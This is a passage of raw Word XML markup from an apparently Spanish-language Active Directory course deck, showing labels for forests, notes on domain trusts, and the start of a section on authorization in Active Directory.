        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0157F65A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26928C26" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="152"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F176326" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="8378"/>
          <w:tab w:val="left" w:pos="12803"/>
        </w:tabs>
        <w:ind w:left="3803"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B38DF12" wp14:editId="5FD28962">
                <wp:extent cx="1370330" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="1269" b="6350"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="45B8BACF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="611"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bosque 1</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4B38DF12" id="Textbox 274" o:spid="_x0000_s1147" type="#_x0000_t202" style="width:107.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="45B8BACF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="611"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bosque 1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2AED5842" wp14:editId="6E5FA5C7">
                <wp:extent cx="1370330" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="1269" b="6350"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="64A4E516" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="613"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bosque 2</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2AED5842" id="Textbox 275" o:spid="_x0000_s1148" type="#_x0000_t202" style="width:107.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="64A4E516" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="613"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bosque 2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6667C045" wp14:editId="3548165F">
                <wp:extent cx="1370330" cy="307975"/>
                <wp:effectExtent l="9525" t="0" r="1269" b="6350"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="734D5855" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="57"/>
                              <w:ind w:left="613"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>Bosque 3</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6667C045" id="Textbox 276" o:spid="_x0000_s1149" type="#_x0000_t202" style="width:107.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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="734D5855" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="57"/>
                        <w:ind w:left="613"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Bosque 3</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4389E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D0D2918" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CEE6BEF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61AFB785" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D20415C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49782A4F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FBE1E8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57164684" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9C0980" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59253B48" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04601373" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74D6D188" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7031356E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ADBB3E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4990560A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4141AA47" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2E4E2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E79A26E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B595BDC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E25D12D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="143"/>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45696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="298F054B" wp14:editId="6ECACC5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4512564</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>267670</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3136900" cy="307975"/>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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="0D9FEA2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="346"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>1. Confianzas entre el dominio raíz del bosque</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="298F054B" id="Textbox 277" o:spid="_x0000_s1150" type="#_x0000_t202" style="position:absolute;margin-left:355.3pt;margin-top:21.1pt;width:247pt;height:24.25pt;z-index:-1567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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="0D9FEA2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="346"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>1. Confianzas entre el dominio raíz del bosque</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD6856A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FC8F3BA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="110"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B3ACD3C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:ind w:left="16859" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15787520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="750ED583" wp14:editId="5521F89A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4524755</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-208748</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2996565" cy="30797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307975"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="26FAF4E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="59"/>
                              <w:ind w:left="371"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>2. Los fideicomisos pueden ser unidireccionales y bidireccionales</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="750ED583" id="Textbox 278" o:spid="_x0000_s1151" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:356.3pt;margin-top:-16.45pt;width:235.95pt;height:24.25pt;z-index:1578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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="26FAF4E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="59"/>
                        <w:ind w:left="371"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>2. Los fideicomisos pueden ser unidireccionales y bidireccionales</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>68</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E04626" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="5"/>
        <w:ind w:right="47"/>
        <w:jc w:val="center"/>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p>
    <w:p w14:paraId="7BEFE0FD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId121"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="60" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C974B29" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1042"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="1042" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Autorización en Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132B4A79" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1762"/>
        </w:tabs>
        <w:spacing w:before="575" w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1762" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Autorización significa si a un usuario se le permite o deniega específicamente el acceso a un recurso en el AD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED4D0FB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="460" w:lineRule="exact"/>
        <w:ind w:left="1763"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>red.</w:t>
      </w:r>
    </w:p>
